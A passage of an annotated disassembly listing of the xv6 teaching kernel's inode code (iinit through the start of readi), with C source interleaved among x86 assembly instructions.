$0x80110a40,%ebx 80101479: 83 ec 0c sub $0xc,%esp int i = 0; initlock(&icache.lock, "icache"); 8010147c: 68 ab 72 10 80 push $0x801072ab 80101481: 68 00 0a 11 80 push $0x80110a00 80101486: e8 95 2f 00 00 call 80104420 <initlock> 8010148b: 83 c4 10 add $0x10,%esp 8010148e: 66 90 xchg %ax,%ax for(i = 0; i < NINODE; i++) { initsleeplock(&icache.inode[i].lock, "inode"); 80101490: 83 ec 08 sub $0x8,%esp 80101493: 68 b2 72 10 80 push $0x801072b2 80101498: 53 push %ebx 80101499: 81 c3 90 00 00 00 add $0x90,%ebx 8010149f: e8 6c 2e 00 00 call 80104310 <initsleeplock> iinit(int dev) { int i = 0; initlock(&icache.lock, "icache"); for(i = 0; i < NINODE; i++) { 801014a4: 83 c4 10 add $0x10,%esp 801014a7: 81 fb 60 26 11 80 cmp $0x80112660,%ebx 801014ad: 75 e1 jne 80101490 <iinit+0x20> initsleeplock(&icache.inode[i].lock, "inode"); } readsb(dev, &sb); 801014af: 83 ec 08 sub $0x8,%esp 801014b2: 68 e0 09 11 80 push $0x801109e0 801014b7: ff 75 08 pushl 0x8(%ebp) 801014ba: e8 f1 fe ff ff call 801013b0 <readsb> cprintf("sb: size %d nblocks %d ninodes %d nlog %d logstart %d\ 801014bf: ff 35 f8 09 11 80 pushl 0x801109f8 801014c5: ff 35 f4 09 11 80 pushl 0x801109f4 801014cb: ff 35 f0 09 11 80 pushl 0x801109f0 801014d1: ff 35 ec 09 11 80 pushl 0x801109ec 801014d7: ff 35 e8 09 11 80 pushl 0x801109e8 801014dd: ff 35 e4 09 11 80 pushl 0x801109e4 801014e3: ff 35 e0 09 11 80 pushl 0x801109e0 801014e9: 68 18 73 10 80 push $0x80107318 801014ee: e8 6d f1 ff ff call 80100660 <cprintf> inodestart %d bmap start %d\n", sb.size, sb.nblocks, sb.ninodes, sb.nlog, sb.logstart, sb.inodestart, sb.bmapstart); } 801014f3: 83 c4 30 add $0x30,%esp 801014f6: 8b 5d fc mov -0x4(%ebp),%ebx 801014f9: c9 leave 801014fa: c3 ret 801014fb: 90 nop 801014fc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80101500 <ialloc>: // Allocate an inode on device dev. // Mark it as allocated by giving it type type. // Returns an unlocked but allocated and referenced inode. struct inode* ialloc(uint dev, short type) { 80101500: 55 push %ebp 80101501: 89 e5 mov %esp,%ebp 80101503: 57 push %edi 80101504: 56 push %esi 80101505: 53 push %ebx 80101506: 83 ec 1c sub $0x1c,%esp int inum; struct buf *bp; struct dinode *dip; for(inum = 1; inum < sb.ninodes; inum++){ 80101509: 83 3d e8 09 11 80 01 cmpl $0x1,0x801109e8 // Allocate an inode on device dev. // Mark it as allocated by giving it type type. // Returns an unlocked but allocated and referenced inode. struct inode* ialloc(uint dev, short type) { 80101510: 8b 45 0c mov 0xc(%ebp),%eax 80101513: 8b 75 08 mov 0x8(%ebp),%esi 80101516: 89 45 e4 mov %eax,-0x1c(%ebp) int inum; struct buf *bp; struct dinode *dip; for(inum = 1; inum < sb.ninodes; inum++){ 80101519: 0f 86 91 00 00 00 jbe 801015b0 <ialloc+0xb0> 8010151f: bb 01 00 00 00 mov $0x1,%ebx 80101524: eb 21 jmp 80101547 <ialloc+0x47> 80101526: 8d 76 00 lea 0x0(%esi),%esi 80101529: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi dip->type = type; log_write(bp); // mark it allocated on the disk brelse(bp); return iget(dev, inum); } brelse(bp); 80101530: 83 ec 0c sub $0xc,%esp { int inum; struct buf *bp; struct dinode *dip; for(inum = 1; inum < sb.ninodes; inum++){ 80101533: 83 c3 01 add $0x1,%ebx dip->type = type; log_write(bp); // mark it allocated on the disk brelse(bp); return iget(dev, inum); } brelse(bp); 80101536: 57 push %edi 80101537: e8 a4 ec ff ff call 801001e0 <brelse> { int inum; struct buf *bp; struct dinode *dip; for(inum = 1; inum < sb.ninodes; inum++){ 8010153c: 83 c4 10 add $0x10,%esp 8010153f: 39 1d e8 09 11 80 cmp %ebx,0x801109e8 80101545: 76 69 jbe 801015b0 <ialloc+0xb0> bp = bread(dev, IBLOCK(inum, sb)); 80101547: 89 d8 mov %ebx,%eax 80101549: 83 ec 08 sub $0x8,%esp 8010154c: c1 e8 03 shr $0x3,%eax 8010154f: 03 05 f4 09 11 80 add 0x801109f4,%eax 80101555: 50 push %eax 80101556: 56 push %esi 80101557: e8 74 eb ff ff call 801000d0 <bread> 8010155c: 89 c7 mov %eax,%edi dip = (struct dinode*)bp->data + inum%IPB; 8010155e: 89 d8 mov %ebx,%eax if(dip->type == 0){ // a free inode 80101560: 83 c4 10 add $0x10,%esp struct buf *bp; struct dinode *dip; for(inum = 1; inum < sb.ninodes; inum++){ bp = bread(dev, IBLOCK(inum, sb)); dip = (struct dinode*)bp->data + inum%IPB; 80101563: 83 e0 07 and $0x7,%eax 80101566: c1 e0 06 shl $0x6,%eax 80101569: 8d 4c 07 5c lea 0x5c(%edi,%eax,1),%ecx if(dip->type == 0){ // a free inode 8010156d: 66 83 39 00 cmpw $0x0,(%ecx) 80101571: 75 bd jne 80101530 <ialloc+0x30> memset(dip, 0, sizeof(*dip)); 80101573: 83 ec 04 sub $0x4,%esp 80101576: 89 4d e0 mov %ecx,-0x20(%ebp) 80101579: 6a 40 push $0x40 8010157b: 6a 00 push $0x0 8010157d: 51 push %ecx 8010157e: e8 0d 31 00 00 call 80104690 <memset> dip->type = type; 80101583: 0f b7 45 e4 movzwl -0x1c(%ebp),%eax 80101587: 8b 4d e0 mov -0x20(%ebp),%ecx 8010158a: 66 89 01 mov %ax,(%ecx) log_write(bp); // mark it allocated on the disk 8010158d: 89 3c 24 mov %edi,(%esp) 80101590: e8 9b 17 00 00 call 80102d30 <log_write> brelse(bp); 80101595: 89 3c 24 mov %edi,(%esp) 80101598: e8 43 ec ff ff call 801001e0 <brelse> return iget(dev, inum); 8010159d: 83 c4 10 add $0x10,%esp } brelse(bp); } panic("ialloc: no inodes"); } 801015a0: 8d 65 f4 lea -0xc(%ebp),%esp if(dip->type == 0){ // a free inode memset(dip, 0, sizeof(*dip)); dip->type = type; log_write(bp); // mark it allocated on the disk brelse(bp); return iget(dev, inum); 801015a3: 89 da mov %ebx,%edx 801015a5: 89 f0 mov %esi,%eax } brelse(bp); } panic("ialloc: no inodes"); } 801015a7: 5b pop %ebx 801015a8: 5e pop %esi 801015a9: 5f pop %edi 801015aa: 5d pop %ebp if(dip->type == 0){ // a free inode memset(dip, 0, sizeof(*dip)); dip->type = type; log_write(bp); // mark it allocated on the disk brelse(bp); return iget(dev, inum); 801015ab: e9 60 fc ff ff jmp 80101210 <iget> } brelse(bp); } panic("ialloc: no inodes"); 801015b0: 83 ec 0c sub $0xc,%esp 801015b3: 68 b8 72 10 80 push $0x801072b8 801015b8: e8 b3 ed ff ff call 80100370 <panic> 801015bd: 8d 76 00 lea 0x0(%esi),%esi 801015c0 <iupdate>: // Must be called after every change to an ip->xxx field // that lives on disk, since i-node cache is write-through. // Caller must hold ip->lock. void iupdate(struct inode *ip) { 801015c0: 55 push %ebp 801015c1: 89 e5 mov %esp,%ebp 801015c3: 56 push %esi 801015c4: 53 push %ebx 801015c5: 8b 5d 08 mov 0x8(%ebp),%ebx struct buf *bp; struct dinode *dip; bp = bread(ip->dev, IBLOCK(ip->inum, sb)); 801015c8: 83 ec 08 sub $0x8,%esp 801015cb: 8b 43 04 mov 0x4(%ebx),%eax dip->type = ip->type; dip->major = ip->major; dip->minor = ip->minor; dip->nlink = ip->nlink; dip->size = ip->size; memmove(dip->addrs, ip->addrs, sizeof(ip->addrs)); 801015ce: 83 c3 5c add $0x5c,%ebx iupdate(struct inode *ip) { struct buf *bp; struct dinode *dip; bp = bread(ip->dev, IBLOCK(ip->inum, sb)); 801015d1: c1 e8 03 shr $0x3,%eax 801015d4: 03 05 f4 09 11 80 add 0x801109f4,%eax 801015da: 50 push %eax 801015db: ff 73 a4 pushl -0x5c(%ebx) 801015de: e8 ed ea ff ff call 801000d0 <bread> 801015e3: 89 c6 mov %eax,%esi dip = (struct dinode*)bp->data + ip->inum%IPB; 801015e5: 8b 43 a8 mov -0x58(%ebx),%eax dip->type = ip->type; 801015e8: 0f b7 53 f4 movzwl -0xc(%ebx),%edx dip->major = ip->major; dip->minor = ip->minor; dip->nlink = ip->nlink; dip->size = ip->size; memmove(dip->addrs, ip->addrs, sizeof(ip->addrs)); 801015ec: 83 c4 0c add $0xc,%esp { struct buf *bp; struct dinode *dip; bp = bread(ip->dev, IBLOCK(ip->inum, sb)); dip = (struct dinode*)bp->data + ip->inum%IPB; 801015ef: 83 e0 07 and $0x7,%eax 801015f2: c1 e0 06 shl $0x6,%eax 801015f5: 8d 44 06 5c lea 0x5c(%esi,%eax,1),%eax dip->type = ip->type; 801015f9: 66 89 10 mov %dx,(%eax) dip->major = ip->major; 801015fc: 0f b7 53 f6 movzwl -0xa(%ebx),%edx dip->minor = ip->minor; dip->nlink = ip->nlink; dip->size = ip->size; memmove(dip->addrs, ip->addrs, sizeof(ip->addrs)); 80101600: 83 c0 0c add $0xc,%eax struct dinode *dip; bp = bread(ip->dev, IBLOCK(ip->inum, sb)); dip = (struct dinode*)bp->data + ip->inum%IPB; dip->type = ip->type; dip->major = ip->major; 80101603: 66 89 50 f6 mov %dx,-0xa(%eax) dip->minor = ip->minor; 80101607: 0f b7 53 f8 movzwl -0x8(%ebx),%edx 8010160b: 66 89 50 f8 mov %dx,-0x8(%eax) dip->nlink = ip->nlink; 8010160f: 0f b7 53 fa movzwl -0x6(%ebx),%edx 80101613: 66 89 50 fa mov %dx,-0x6(%eax) dip->size = ip->size; 80101617: 8b 53 fc mov -0x4(%ebx),%edx 8010161a: 89 50 fc mov %edx,-0x4(%eax) memmove(dip->addrs, ip->addrs, sizeof(ip->addrs)); 8010161d: 6a 34 push $0x34 8010161f: 53 push %ebx 80101620: 50 push %eax 80101621: e8 1a 31 00 00 call 80104740 <memmove> log_write(bp); 80101626: 89 34 24 mov %esi,(%esp) 80101629: e8 02 17 00 00 call 80102d30 <log_write> brelse(bp); 8010162e: 89 75 08 mov %esi,0x8(%ebp) 80101631: 83 c4 10 add $0x10,%esp } 80101634: 8d 65 f8 lea -0x8(%ebp),%esp 80101637: 5b pop %ebx 80101638: 5e pop %esi 80101639: 5d pop %ebp dip->minor = ip->minor; dip->nlink = ip->nlink; dip->size = ip->size; memmove(dip->addrs, ip->addrs, sizeof(ip->addrs)); log_write(bp); brelse(bp); 8010163a: e9 a1 eb ff ff jmp 801001e0 <brelse> 8010163f: 90 nop 80101640 <idup>: // Increment reference count for ip. // Returns ip to enable ip = idup(ip1) idiom. struct inode* idup(struct inode *ip) { 80101640: 55 push %ebp 80101641: 89 e5 mov %esp,%ebp 80101643: 53 push %ebx 80101644: 83 ec 10 sub $0x10,%esp 80101647: 8b 5d 08 mov 0x8(%ebp),%ebx acquire(&icache.lock); 8010164a: 68 00 0a 11 80 push $0x80110a00 8010164f: e8 cc 2e 00 00 call 80104520 <acquire> ip->ref++; 80101654: 83 43 08 01 addl $0x1,0x8(%ebx) release(&icache.lock); 80101658: c7 04 24 00 0a 11 80 movl $0x80110a00,(%esp) 8010165f: e8 dc 2f 00 00 call 80104640 <release> return ip; } 80101664: 89 d8 mov %ebx,%eax 80101666: 8b 5d fc mov -0x4(%ebp),%ebx 80101669: c9 leave 8010166a: c3 ret 8010166b: 90 nop 8010166c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80101670 <ilock>: // Lock the given inode. // Reads the inode from disk if necessary. void ilock(struct inode *ip) { 80101670: 55 push %ebp 80101671: 89 e5 mov %esp,%ebp 80101673: 56 push %esi 80101674: 53 push %ebx 80101675: 8b 5d 08 mov 0x8(%ebp),%ebx struct buf *bp; struct dinode *dip; if(ip == 0 || ip->ref < 1) 80101678: 85 db test %ebx,%ebx 8010167a: 0f 84 b7 00 00 00 je 80101737 <ilock+0xc7> 80101680: 8b 53 08 mov 0x8(%ebx),%edx 80101683: 85 d2 test %edx,%edx 80101685: 0f 8e ac 00 00 00 jle 80101737 <ilock+0xc7> panic("ilock"); acquiresleep(&ip->lock); 8010168b: 8d 43 0c lea 0xc(%ebx),%eax 8010168e: 83 ec 0c sub $0xc,%esp 80101691: 50 push %eax 80101692: e8 b9 2c 00 00 call 80104350 <acquiresleep> if(ip->valid == 0){ 80101697: 8b 43 4c mov 0x4c(%ebx),%eax 8010169a: 83 c4 10 add $0x10,%esp 8010169d: 85 c0 test %eax,%eax 8010169f: 74 0f je 801016b0 <ilock+0x40> brelse(bp); ip->valid = 1; if(ip->type == 0) panic("ilock: no type"); } } 801016a1: 8d 65 f8 lea -0x8(%ebp),%esp 801016a4: 5b pop %ebx 801016a5: 5e pop %esi 801016a6: 5d pop %ebp 801016a7: c3 ret 801016a8: 90 nop 801016a9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi panic("ilock"); acquiresleep(&ip->lock); if(ip->valid == 0){ bp = bread(ip->dev, IBLOCK(ip->inum, sb)); 801016b0: 8b 43 04 mov 0x4(%ebx),%eax 801016b3: 83 ec 08 sub $0x8,%esp 801016b6: c1 e8 03 shr $0x3,%eax 801016b9: 03 05 f4 09 11 80 add 0x801109f4,%eax 801016bf: 50 push %eax 801016c0: ff 33 pushl (%ebx) 801016c2: e8 09 ea ff ff call 801000d0 <bread> 801016c7: 89 c6 mov %eax,%esi dip = (struct dinode*)bp->data + ip->inum%IPB; 801016c9: 8b 43 04 mov 0x4(%ebx),%eax ip->type = dip->type; ip->major = dip->major; ip->minor = dip->minor; ip->nlink = dip->nlink; ip->size = dip->size; memmove(ip->addrs, dip->addrs, sizeof(ip->addrs)); 801016cc: 83 c4 0c add $0xc,%esp acquiresleep(&ip->lock); if(ip->valid == 0){ bp = bread(ip->dev, IBLOCK(ip->inum, sb)); dip = (struct dinode*)bp->data + ip->inum%IPB; 801016cf: 83 e0 07 and $0x7,%eax 801016d2: c1 e0 06 shl $0x6,%eax 801016d5: 8d 44 06 5c lea 0x5c(%esi,%eax,1),%eax ip->type = dip->type; 801016d9: 0f b7 10 movzwl (%eax),%edx ip->major = dip->major; ip->minor = dip->minor; ip->nlink = dip->nlink; ip->size = dip->size; memmove(ip->addrs, dip->addrs, sizeof(ip->addrs)); 801016dc: 83 c0 0c add $0xc,%eax acquiresleep(&ip->lock); if(ip->valid == 0){ bp = bread(ip->dev, IBLOCK(ip->inum, sb)); dip = (struct dinode*)bp->data + ip->inum%IPB; ip->type = dip->type; 801016df: 66 89 53 50 mov %dx,0x50(%ebx) ip->major = dip->major; 801016e3: 0f b7 50 f6 movzwl -0xa(%eax),%edx 801016e7: 66 89 53 52 mov %dx,0x52(%ebx) ip->minor = dip->minor; 801016eb: 0f b7 50 f8 movzwl -0x8(%eax),%edx 801016ef: 66 89 53 54 mov %dx,0x54(%ebx) ip->nlink = dip->nlink; 801016f3: 0f b7 50 fa movzwl -0x6(%eax),%edx 801016f7: 66 89 53 56 mov %dx,0x56(%ebx) ip->size = dip->size; 801016fb: 8b 50 fc mov -0x4(%eax),%edx 801016fe: 89 53 58 mov %edx,0x58(%ebx) memmove(ip->addrs, dip->addrs, sizeof(ip->addrs)); 80101701: 6a 34 push $0x34 80101703: 50 push %eax 80101704: 8d 43 5c lea 0x5c(%ebx),%eax 80101707: 50 push %eax 80101708: e8 33 30 00 00 call 80104740 <memmove> brelse(bp); 8010170d: 89 34 24 mov %esi,(%esp) 80101710: e8 cb ea ff ff call 801001e0 <brelse> ip->valid = 1; if(ip->type == 0) 80101715: 83 c4 10 add $0x10,%esp 80101718: 66 83 7b 50 00 cmpw $0x0,0x50(%ebx) ip->minor = dip->minor; ip->nlink = dip->nlink; ip->size = dip->size; memmove(ip->addrs, dip->addrs, sizeof(ip->addrs)); brelse(bp); ip->valid = 1; 8010171d: c7 43 4c 01 00 00 00 movl $0x1,0x4c(%ebx) if(ip->type == 0) 80101724: 0f 85 77 ff ff ff jne 801016a1 <ilock+0x31> panic("ilock: no type"); 8010172a: 83 ec 0c sub $0xc,%esp 8010172d: 68 d0 72 10 80 push $0x801072d0 80101732: e8 39 ec ff ff call 80100370 <panic> { struct buf *bp; struct dinode *dip; if(ip == 0 || ip->ref < 1) panic("ilock"); 80101737: 83 ec 0c sub $0xc,%esp 8010173a: 68 ca 72 10 80 push $0x801072ca 8010173f: e8 2c ec ff ff call 80100370 <panic> 80101744: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 8010174a: 8d bf 00 00 00 00 lea 0x0(%edi),%edi 80101750 <iunlock>: } // Unlock the given inode. void iunlock(struct inode *ip) { 80101750: 55 push %ebp 80101751: 89 e5 mov %esp,%ebp 80101753: 56 push %esi 80101754: 53 push %ebx 80101755: 8b 5d 08 mov 0x8(%ebp),%ebx if(ip == 0 || !holdingsleep(&ip->lock) || ip->ref < 1) 80101758: 85 db test %ebx,%ebx 8010175a: 74 28 je 80101784 <iunlock+0x34> 8010175c: 8d 73 0c lea 0xc(%ebx),%esi 8010175f: 83 ec 0c sub $0xc,%esp 80101762: 56 push %esi 80101763: e8 88 2c 00 00 call 801043f0 <holdingsleep> 80101768: 83 c4 10 add $0x10,%esp 8010176b: 85 c0 test %eax,%eax 8010176d: 74 15 je 80101784 <iunlock+0x34> 8010176f: 8b 43 08 mov 0x8(%ebx),%eax 80101772: 85 c0 test %eax,%eax 80101774: 7e 0e jle 80101784 <iunlock+0x34> panic("iunlock"); releasesleep(&ip->lock); 80101776: 89 75 08 mov %esi,0x8(%ebp) } 80101779: 8d 65 f8 lea -0x8(%ebp),%esp 8010177c: 5b pop %ebx 8010177d: 5e pop %esi 8010177e: 5d pop %ebp iunlock(struct inode *ip) { if(ip == 0 || !holdingsleep(&ip->lock) || ip->ref < 1) panic("iunlock"); releasesleep(&ip->lock); 8010177f: e9 2c 2c 00 00 jmp 801043b0 <releasesleep> // Unlock the given inode. void iunlock(struct inode *ip) { if(ip == 0 || !holdingsleep(&ip->lock) || ip->ref < 1) panic("iunlock"); 80101784: 83 ec 0c sub $0xc,%esp 80101787: 68 df 72 10 80 push $0x801072df 8010178c: e8 df eb ff ff call 80100370 <panic> 80101791: eb 0d jmp 801017a0 <iput> 80101793: 90 nop 80101794: 90 nop 80101795: 90 nop 80101796: 90 nop 80101797: 90 nop 80101798: 90 nop 80101799: 90 nop 8010179a: 90 nop 8010179b: 90 nop 8010179c: 90 nop 8010179d: 90 nop 8010179e: 90 nop 8010179f: 90 nop 801017a0 <iput>: // to it, free the inode (and its content) on disk. // All calls to iput() must be inside a transaction in // case it has to free the inode. void iput(struct inode *ip) { 801017a0: 55 push %ebp 801017a1: 89 e5 mov %esp,%ebp 801017a3: 57 push %edi 801017a4: 56 push %esi 801017a5: 53 push %ebx 801017a6: 83 ec 28 sub $0x28,%esp 801017a9: 8b 75 08 mov 0x8(%ebp),%esi acquiresleep(&ip->lock); 801017ac: 8d 7e 0c lea 0xc(%esi),%edi 801017af: 57 push %edi 801017b0: e8 9b 2b 00 00 call 80104350 <acquiresleep> if(ip->valid && ip->nlink == 0){ 801017b5: 8b 56 4c mov 0x4c(%esi),%edx 801017b8: 83 c4 10 add $0x10,%esp 801017bb: 85 d2 test %edx,%edx 801017bd: 74 07 je 801017c6 <iput+0x26> 801017bf: 66 83 7e 56 00 cmpw $0x0,0x56(%esi) 801017c4: 74 32 je 801017f8 <iput+0x58> ip->type = 0; iupdate(ip); ip->valid = 0; } } releasesleep(&ip->lock); 801017c6: 83 ec 0c sub $0xc,%esp 801017c9: 57 push %edi 801017ca: e8 e1 2b 00 00 call 801043b0 <releasesleep> acquire(&icache.lock); 801017cf: c7 04 24 00 0a 11 80 movl $0x80110a00,(%esp) 801017d6: e8 45 2d 00 00 call 80104520 <acquire> ip->ref--; 801017db: 83 6e 08 01 subl $0x1,0x8(%esi) release(&icache.lock); 801017df: 83 c4 10 add $0x10,%esp 801017e2: c7 45 08 00 0a 11 80 movl $0x80110a00,0x8(%ebp) } 801017e9: 8d 65 f4 lea -0xc(%ebp),%esp 801017ec: 5b pop %ebx 801017ed: 5e pop %esi 801017ee: 5f pop %edi 801017ef: 5d pop %ebp } releasesleep(&ip->lock); acquire(&icache.lock); ip->ref--; release(&icache.lock); 801017f0: e9 4b 2e 00 00 jmp 80104640 <release> 801017f5: 8d 76 00 lea 0x0(%esi),%esi void iput(struct inode *ip) { acquiresleep(&ip->lock); if(ip->valid && ip->nlink == 0){ acquire(&icache.lock); 801017f8: 83 ec 0c sub $0xc,%esp 801017fb: 68 00 0a 11 80 push $0x80110a00 80101800: e8 1b 2d 00 00 call 80104520 <acquire> int r = ip->ref; 80101805: 8b 5e 08 mov 0x8(%esi),%ebx release(&icache.lock); 80101808: c7 04 24 00 0a 11 80 movl $0x80110a00,(%esp) 8010180f: e8 2c 2e 00 00 call 80104640 <release> if(r == 1){ 80101814: 83 c4 10 add $0x10,%esp 80101817: 83 fb 01 cmp $0x1,%ebx 8010181a: 75 aa jne 801017c6 <iput+0x26> 8010181c: 8d 8e 8c 00 00 00 lea 0x8c(%esi),%ecx 80101822: 89 7d e4 mov %edi,-0x1c(%ebp) 80101825: 8d 5e 5c lea 0x5c(%esi),%ebx 80101828: 89 cf mov %ecx,%edi 8010182a: eb 0b jmp 80101837 <iput+0x97> 8010182c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80101830: 83 c3 04 add $0x4,%ebx { int i, j; struct buf *bp; uint *a; for(i = 0; i < NDIRECT; i++){ 80101833: 39 fb cmp %edi,%ebx 80101835: 74 19 je 80101850 <iput+0xb0> if(ip->addrs[i]){ 80101837: 8b 13 mov (%ebx),%edx 80101839: 85 d2 test %edx,%edx 8010183b: 74 f3 je 80101830 <iput+0x90> bfree(ip->dev, ip->addrs[i]); 8010183d: 8b 06 mov (%esi),%eax 8010183f: e8 ac fb ff ff call 801013f0 <bfree> ip->addrs[i] = 0; 80101844: c7 03 00 00 00 00 movl $0x0,(%ebx) 8010184a: eb e4 jmp 80101830 <iput+0x90> 8010184c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi } } if(ip->addrs[NDIRECT]){ 80101850: 8b 86 8c 00 00 00 mov 0x8c(%esi),%eax 80101856: 8b 7d e4 mov -0x1c(%ebp),%edi 80101859: 85 c0 test %eax,%eax 8010185b: 75 33 jne 80101890 <iput+0xf0> bfree(ip->dev, ip->addrs[NDIRECT]); ip->addrs[NDIRECT] = 0; } ip->size = 0; iupdate(ip); 8010185d: 83 ec 0c sub $0xc,%esp brelse(bp); bfree(ip->dev, ip->addrs[NDIRECT]); ip->addrs[NDIRECT] = 0; } ip->size = 0; 80101860: c7 46 58 00 00 00 00 movl $0x0,0x58(%esi) iupdate(ip); 80101867: 56 push %esi 80101868: e8 53 fd ff ff call 801015c0 <iupdate> int r = ip->ref; release(&icache.lock); if(r == 1){ // inode has no links and no other references: truncate and free. itrunc(ip); ip->type = 0; 8010186d: 31 c0 xor %eax,%eax 8010186f: 66 89 46 50 mov %ax,0x50(%esi) iupdate(ip); 80101873: 89 34 24 mov %esi,(%esp) 80101876: e8 45 fd ff ff call 801015c0 <iupdate> ip->valid = 0; 8010187b: c7 46 4c 00 00 00 00 movl $0x0,0x4c(%esi) 80101882: 83 c4 10 add $0x10,%esp 80101885: e9 3c ff ff ff jmp 801017c6 <iput+0x26> 8010188a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi ip->addrs[i] = 0; } } if(ip->addrs[NDIRECT]){ bp = bread(ip->dev, ip->addrs[NDIRECT]); 80101890: 83 ec 08 sub $0x8,%esp 80101893: 50 push %eax 80101894: ff 36 pushl (%esi) 80101896: e8 35 e8 ff ff call 801000d0 <bread> 8010189b: 8d 88 5c 02 00 00 lea 0x25c(%eax),%ecx 801018a1: 89 7d e0 mov %edi,-0x20(%ebp) 801018a4: 89 45 e4 mov %eax,-0x1c(%ebp) a = (uint*)bp->data; 801018a7: 8d 58 5c lea 0x5c(%eax),%ebx 801018aa: 83 c4 10 add $0x10,%esp 801018ad: 89 cf mov %ecx,%edi 801018af: eb 0e jmp 801018bf <iput+0x11f> 801018b1: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 801018b8: 83 c3 04 add $0x4,%ebx for(j = 0; j < NINDIRECT; j++){ 801018bb: 39 fb cmp %edi,%ebx 801018bd: 74 0f je 801018ce <iput+0x12e> if(a[j]) 801018bf: 8b 13 mov (%ebx),%edx 801018c1: 85 d2 test %edx,%edx 801018c3: 74 f3 je 801018b8 <iput+0x118> bfree(ip->dev, a[j]); 801018c5: 8b 06 mov (%esi),%eax 801018c7: e8 24 fb ff ff call 801013f0 <bfree> 801018cc: eb ea jmp 801018b8 <iput+0x118> } brelse(bp); 801018ce: 83 ec 0c sub $0xc,%esp 801018d1: ff 75 e4 pushl -0x1c(%ebp) 801018d4: 8b 7d e0 mov -0x20(%ebp),%edi 801018d7: e8 04 e9 ff ff call 801001e0 <brelse> bfree(ip->dev, ip->addrs[NDIRECT]); 801018dc: 8b 96 8c 00 00 00 mov 0x8c(%esi),%edx 801018e2: 8b 06 mov (%esi),%eax 801018e4: e8 07 fb ff ff call 801013f0 <bfree> ip->addrs[NDIRECT] = 0; 801018e9: c7 86 8c 00 00 00 00 movl $0x0,0x8c(%esi) 801018f0: 00 00 00 801018f3: 83 c4 10 add $0x10,%esp 801018f6: e9 62 ff ff ff jmp 8010185d <iput+0xbd> 801018fb: 90 nop 801018fc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80101900 <iunlockput>: } // Common idiom: unlock, then put. void iunlockput(struct inode *ip) { 80101900: 55 push %ebp 80101901: 89 e5 mov %esp,%ebp 80101903: 53 push %ebx 80101904: 83 ec 10 sub $0x10,%esp 80101907: 8b 5d 08 mov 0x8(%ebp),%ebx iunlock(ip); 8010190a: 53 push %ebx 8010190b: e8 40 fe ff ff call 80101750 <iunlock> iput(ip); 80101910: 89 5d 08 mov %ebx,0x8(%ebp) 80101913: 83 c4 10 add $0x10,%esp } 80101916: 8b 5d fc mov -0x4(%ebp),%ebx 80101919: c9 leave // Common idiom: unlock, then put. void iunlockput(struct inode *ip) { iunlock(ip); iput(ip); 8010191a: e9 81 fe ff ff jmp 801017a0 <iput> 8010191f: 90 nop 80101920 <stati>: // Copy stat information from inode. // Caller must hold ip->lock. void stati(struct inode *ip, struct stat *st) { 80101920: 55 push %ebp 80101921: 89 e5 mov %esp,%ebp 80101923: 8b 55 08 mov 0x8(%ebp),%edx 80101926: 8b 45 0c mov 0xc(%ebp),%eax st->dev = ip->dev; 80101929: 8b 0a mov (%edx),%ecx 8010192b: 89 48 04 mov %ecx,0x4(%eax) st->ino = ip->inum; 8010192e: 8b 4a 04 mov 0x4(%edx),%ecx 80101931: 89 48 08 mov %ecx,0x8(%eax) st->type = ip->type; 80101934: 0f b7 4a 50 movzwl 0x50(%edx),%ecx 80101938: 66 89 08 mov %cx,(%eax) st->nlink = ip->nlink; 8010193b: 0f b7 4a 56 movzwl 0x56(%edx),%ecx 8010193f: 66 89 48 0c mov %cx,0xc(%eax) st->size = ip->size; 80101943: 8b 52 58 mov 0x58(%edx),%edx 80101946: 89 50 10 mov %edx,0x10(%eax) } 80101949: 5d pop %ebp 8010194a: c3 ret 8010194b: 90 nop 8010194c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80101950 <readi>: //PAGEBREAK! // Read data from inode. // Caller must hold ip->lock. int readi(struct inode *ip, char *dst, uint off, uint n) { 80101950: 55 push %ebp 80101951: 89 e5 mov %esp,%ebp 80101953: 57 push %edi 80101954: 56 push %esi 80101955: 53 push %ebx 80101956: 83 ec 1c sub $0x1c,%esp 80101959: 8b 45 08 mov 0x8(%ebp),%eax 8010195c: 8b 7d 0c mov 0xc(%ebp),%edi 8010195f: 8b 75 10 mov 0x10(%ebp),%esi uint tot, m; struct buf *bp; if(ip->type == T_DEV){ 80101962: 66 83 78 50 03 cmpw $0x3,0x50(%eax) //PAGEBREAK! // Read data from inode. // Caller must hold ip->lock. int readi(struct inode *ip, char *dst, uint off, uint n) { 80101967: 89 7d e0 mov %edi,-0x20(%ebp) 8010196a: 8b 7d 14 mov 0x14(%ebp),%edi 8010196d: 89 45 d8 mov %eax,-0x28(%ebp) 80101970: 89 7d e4 mov %edi,-0x1c(%ebp) uint tot, m; struct buf *bp; if(ip->type == T_DEV){ 80101973: 0f 84 a7 00 00 00 je 80101a20 <readi+0xd0> if(ip->major < 0 || ip->major >= NDEV || !devsw[ip->major].read) return -1; return devsw[ip->major].read(ip, dst, n); } if(off > ip->size || off + n < off) 80101979: 8b 45 d8 mov -0x28(%ebp),%eax 8010197c: 8b 40 58 mov 0x58(%eax),%eax 8010197f: 39 f0 cmp %esi,%eax 80101981: 0f 82 c1 00 00 00 jb 80101a48 <readi+0xf8> 80101987: 8b 7d e4 mov -0x1c(%ebp),%edi 8010198a: 89 fa mov %edi,%edx 8010198c: 01 f2 add %esi,%edx 8010198e: 0f 82 b4 00 00 00 jb 80101a48 <readi+0xf8> return -1; if(off + n > ip->size) n = ip->size - off; 80101994: 89 c1 mov %eax,%ecx 80101996: 29 f1 sub %esi,%ecx 80101998: 39 d0 cmp %edx,%eax 8010199a: 0f 43 cf cmovae %edi,%ecx for(tot=0; tot<n; tot+=m, off+=m, dst+=m){ 8010199d: 31 ff xor %edi,%edi 8010199f: 85 c9 test %ecx,%ecx } if(off > ip->size || off + n < off) return -1; if(off + n > ip->size) n = ip->size - off; 801019a1: 89 4d e4 mov %ecx,-0x1c(%ebp) for(tot=0; tot<n; tot+=m, off+=m, dst+=m){ 801019a4: 74 6d je 80101a13 